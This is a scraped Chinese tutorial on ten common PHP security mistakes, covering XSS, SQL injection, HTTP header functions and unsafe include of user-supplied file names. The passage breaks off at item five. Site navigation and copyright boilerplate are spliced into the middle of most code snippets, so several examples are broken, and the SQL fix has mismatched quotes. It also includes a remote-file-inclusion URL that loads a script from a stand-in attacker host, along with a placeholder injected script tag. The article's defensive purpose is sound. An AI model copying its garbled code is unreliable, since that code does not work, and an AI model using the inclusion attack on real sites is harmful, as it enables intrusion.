介绍PHP程序员最易犯10种错误
PHP程序员现在越来越承担着中重要的任务。php是个伟大的web开发语言,灵活的语言,但是看到php程序员周而复始的犯的一些错误。我做了下面这个列表,列出了PHP程序员经常犯的10中错误,大多数和安全相关。看看你犯了几种:
1.不转意html entities
一个基本的常识:所有不可信任的输入(特别是用户从form中提交的数据) ,输出之前都要转意。
- echo
介绍PHP程序员最易犯10种错误 _网学 网学推荐
免费论文
原创论文
文章排行榜
- · PHP 5.0中多态性的实现方案浅析
- · 在PHP中实现重载构造函数的方法
- · 详解PHP的面向对象编程
- · ZendStudio for Eclipse 调试入门篇
- · PHP面向对象程序设计的61条黄金法则
- · php面向对象oop
- · php操作文件型数据库SQLite
- · php+mysql分页处理的探讨
- · PHP中使用FCKeditor
- · PHP中使用FCKeditor2.3.2配置
- · 在php中使用FCKeditor2.4.2
- · 织梦dedecms从底层标签实现二级菜单
- · iis下php无法找到该页 的错误解决
- · PHP V5.3 中的新特性: 名称空间
- · IIS下PHP的ISAPI和FastCGI比较
- · PHP开发框架的现状和展望
- · 优化PHP代码的40条建议
- · PHP MVC架构下的一些流行框架...
浏览:GET[''usename''] ;版权所有 QQ:3710167 邮箱:3710167@qq.com 网学网 [Myeducs.cn] 您电脑的分辨率是 像素
Copyright 2008-2015 myeducs.Cn www.myeducs.Cn All Rights Reserved
湘ICP备09003080号
这个例子有可能输出:
<script>/*更改admin密码的脚本或设置cookie的脚本*/</script>
这是一个明显的安全隐患,除非你保证你的用户都正确的输入。
如何修复:
我们需要将”< “,”>”,”and”等转换成正确的HTML表示(<, >’, and “),函数htmlspecialchars 和htmlentities()正是干这个活的。
正确的方法:
- echo htmlspecialchars(
介绍PHP程序员最易犯10种错误 _网学 网学推荐
免费论文
原创论文
文章排行榜
- · PHP 5.0中多态性的实现方案浅析
- · 在PHP中实现重载构造函数的方法
- · 详解PHP的面向对象编程
- · ZendStudio for Eclipse 调试入门篇
- · PHP面向对象程序设计的61条黄金法则
- · php面向对象oop
- · php操作文件型数据库SQLite
- · php+mysql分页处理的探讨
- · PHP中使用FCKeditor
- · PHP中使用FCKeditor2.3.2配置
- · 在php中使用FCKeditor2.4.2
- · 织梦dedecms从底层标签实现二级菜单
- · iis下php无法找到该页 的错误解决
- · PHP V5.3 中的新特性: 名称空间
- · IIS下PHP的ISAPI和FastCGI比较
- · PHP开发框架的现状和展望
- · 优化PHP代码的40条建议
- · PHP MVC架构下的一些流行框架...
浏览:GET[''username''], ENT_QUOTES);版权所有 QQ:3710167 邮箱:3710167@qq.com 网学网 [Myeducs.cn] 您电脑的分辨率是 像素
Copyright 2008-2015 myeducs.Cn www.myeducs.Cn All Rights Reserved
湘ICP备09003080号
2. 不转意SQL输入
我曾经在一篇文章中最简单的防止sql注入的方法(php+MySQL中)讨论过这个问题并给出了一个简单的方法。有人对我说,他们已经在php.ini中将magic_quotes设置为On,所以不必担心这个问题,但是不是所有的输入都是从
网学推荐
免费论文
原创论文
文章排行榜
浏览:
版权所有 QQ:3710167 邮箱:3710167@qq.com 网学网 [Myeducs.cn]
您电脑的分辨率是
像素
Copyright 2008-2015 myeducs.Cn www.myeducs.Cn All Rights Reserved
湘ICP备09003080号
Copyright 2008-2015 myeducs.Cn www.myeducs.Cn All Rights Reserved
湘ICP备09003080号
网学推荐
免费论文
原创论文
文章排行榜
浏览:
版权所有 QQ:3710167 邮箱:3710167@qq.com 网学网 [Myeducs.cn]
您电脑的分辨率是
像素
Copyright 2008-2015 myeducs.Cn www.myeducs.Cn All Rights Reserved
湘ICP备09003080号
Copyright 2008-2015 myeducs.Cn www.myeducs.Cn All Rights Reserved
湘ICP备09003080号
网学推荐
免费论文
原创论文
文章排行榜
浏览:
版权所有 QQ:3710167 邮箱:3710167@qq.com 网学网 [Myeducs.cn]
您电脑的分辨率是
像素
Copyright 2008-2015 myeducs.Cn www.myeducs.Cn All Rights Reserved
湘ICP备09003080号
Copyright 2008-2015 myeducs.Cn www.myeducs.Cn All Rights Reserved
湘ICP备09003080号
如何修复:
和在最简单的防止sql注入的方法(php+mysql中)中一样我还是推荐使用mysql_real_escape_string()函数
正确做法:
- <?php
- $sql = “UPDATE users SET
- name=’.mysql_real_escape_string($name).’
- WHERE id=’.mysql_real_escape_string ($id).’”;
- mysql_query($sql);
- ?>
3.错误的使用HTTP-header 相关的函数:header(), session_start(), setcookie()
遇到过这个警告吗?”warning: Cannot addheader information - headers already sent [....]
每次从服务器下载一个网页的时候,服务器的输出都分成两个部分:头部和正文。
头部包含了一些非可视的数据,例如cookie。头部总是先到达。正文部分包括可视的html,图片等数据。
如果output_buffering设置为Off,所有的HTTP-header相关的函数必须在有输出之前调用。问题在于你在一个环境中开发,而在部署到另一个环境中去的时候,output_buffering的设置可能不一样。结果转向停止了,cookie和session都没有正确的设置。
如何修复:
确保在输出之前调用http-header相关的函数,并且令output_buffering = Off。
4. Require 或include 的文件使用不安全的数据
再次强调:不要相信不是你自己显式声明的数据。不要 Include 或 require 从
网学推荐
免费论文
原创论文
文章排行榜
浏览:
版权所有 QQ:3710167 邮箱:3710167@qq.com 网学网 [Myeducs.cn]
您电脑的分辨率是
像素
Copyright 2008-2015 myeducs.Cn www.myeducs.Cn All Rights Reserved
湘ICP备09003080号
Copyright 2008-2015 myeducs.Cn www.myeducs.Cn All Rights Reserved
湘ICP备09003080号
网学推荐
免费论文
原创论文
文章排行榜
浏览:
版权所有 QQ:3710167 邮箱:3710167@qq.com 网学网 [Myeducs.cn]
您电脑的分辨率是
像素
Copyright 2008-2015 myeducs.Cn www.myeducs.Cn All Rights Reserved
湘ICP备09003080号
Copyright 2008-2015 myeducs.Cn www.myeducs.Cn All Rights Reserved
湘ICP备09003080号
网学推荐
免费论文
原创论文
文章排行榜
浏览:
版权所有 QQ:3710167 邮箱:3710167@qq.com 网学网 [Myeducs.cn]
您电脑的分辨率是
像素
Copyright 2008-2015 myeducs.Cn www.myeducs.Cn All Rights Reserved
湘ICP备09003080号
Copyright 2008-2015 myeducs.Cn www.myeducs.Cn All Rights Reserved
湘ICP备09003080号
例如:
- index.php
- <?
- //including header, config, database connection, etc
- include(
介绍PHP程序员最易犯10种错误 _网学 网学推荐
免费论文
原创论文
文章排行榜
- · PHP 5.0中多态性的实现方案浅析
- · 在PHP中实现重载构造函数的方法
- · 详解PHP的面向对象编程
- · ZendStudio for Eclipse 调试入门篇
- · PHP面向对象程序设计的61条黄金法则
- · php面向对象oop
- · php操作文件型数据库SQLite
- · php+mysql分页处理的探讨
- · PHP中使用FCKeditor
- · PHP中使用FCKeditor2.3.2配置
- · 在php中使用FCKeditor2.4.2
- · 织梦dedecms从底层标签实现二级菜单
- · iis下php无法找到该页 的错误解决
- · PHP V5.3 中的新特性: 名称空间
- · IIS下PHP的ISAPI和FastCGI比较
- · PHP开发框架的现状和展望
- · 优化PHP代码的40条建议
- · PHP MVC架构下的一些流行框架...
浏览:GET[''filename'']);版权所有 QQ:3710167 邮箱:3710167@qq.com 网学网 [Myeducs.cn] 您电脑的分辨率是 像素
Copyright 2008-2015 myeducs.Cn www.myeducs.Cn All Rights Reserved
湘ICP备09003080号- //including footer
- ?>
现在任一个黑客现在都可以用:http://www.yourdomain.com/index.php?filename=anyfile.txt来获取你的机密信息,或执行一个PHP脚本。
如果allow_url_fopen=On,你更是死定了:
试试这个输入:
http://www.yourdomain.com/index. … n.com%2Fphphack.php
现在你的网页中包含了http://www.youaredoomed.com/phphack.php的输出. 黑客可以发送垃圾邮件,改变密码,删除文件等等。只要你能想得到。
如何修复:
你必须自己控制哪些文件可以包含在的include或require指令中。
下面是一个快速但不全面的解决方法:
- <?
- //Include only files that are allowed.
- $allowedFiles = array(’file1.txt’,''file2.txt’,''file3.txt’);
- if(in_array((string)
介绍PHP程序员最易犯10种错误 _网学 网学推荐
免费论文
原创论文
文章排行榜
- · PHP 5.0中多态性的实现方案浅析
- · 在PHP中实现重载构造函数的方法
- · 详解PHP的面向对象编程
- · ZendStudio for Eclipse 调试入门篇
- · PHP面向对象程序设计的61条黄金法则
- · php面向对象oop
- · php操作文件型数据库SQLite
- · php+mysql分页处理的探讨
- · PHP中使用FCKeditor
- · PHP中使用FCKeditor2.3.2配置
- · 在php中使用FCKeditor2.4.2
- · 织梦dedecms从底层标签实现二级菜单
- · iis下php无法找到该页 的错误解决
- · PHP V5.3 中的新特性: 名称空间
- · IIS下PHP的ISAPI和FastCGI比较
- · PHP开发框架的现状和展望
- · 优化PHP代码的40条建议
- · PHP MVC架构下的一些流行框架...
浏览:GET[''filename''],$allowedFiles)) {版权所有 QQ:3710167 邮箱:3710167@qq.com 网学网 [Myeducs.cn] 您电脑的分辨率是 像素
Copyright 2008-2015 myeducs.Cn www.myeducs.Cn All Rights Reserved
湘ICP备09003080号- include(
介绍PHP程序员最易犯10种错误 _网学 网学推荐
免费论文
原创论文
文章排行榜
- · PHP 5.0中多态性的实现方案浅析
- · 在PHP中实现重载构造函数的方法
- · 详解PHP的面向对象编程
- · ZendStudio for Eclipse 调试入门篇
- · PHP面向对象程序设计的61条黄金法则
- · php面向对象oop
- · php操作文件型数据库SQLite
- · php+mysql分页处理的探讨
- · PHP中使用FCKeditor
- · PHP中使用FCKeditor2.3.2配置
- · 在php中使用FCKeditor2.4.2
- · 织梦dedecms从底层标签实现二级菜单
- · iis下php无法找到该页 的错误解决
- · PHP V5.3 中的新特性: 名称空间
- · IIS下PHP的ISAPI和FastCGI比较
- · PHP开发框架的现状和展望
- · 优化PHP代码的40条建议
- · PHP MVC架构下的一些流行框架...
浏览:GET[''filename'']);版权所有 QQ:3710167 邮箱:3710167@qq.com 网学网 [Myeducs.cn] 您电脑的分辨率是 像素
Copyright 2008-2015 myeducs.Cn www.myeducs.Cn All Rights Reserved
湘ICP备09003080号- }
- else{
- exit(’not allowed’);
- }
- ?>
5. 语法错误
语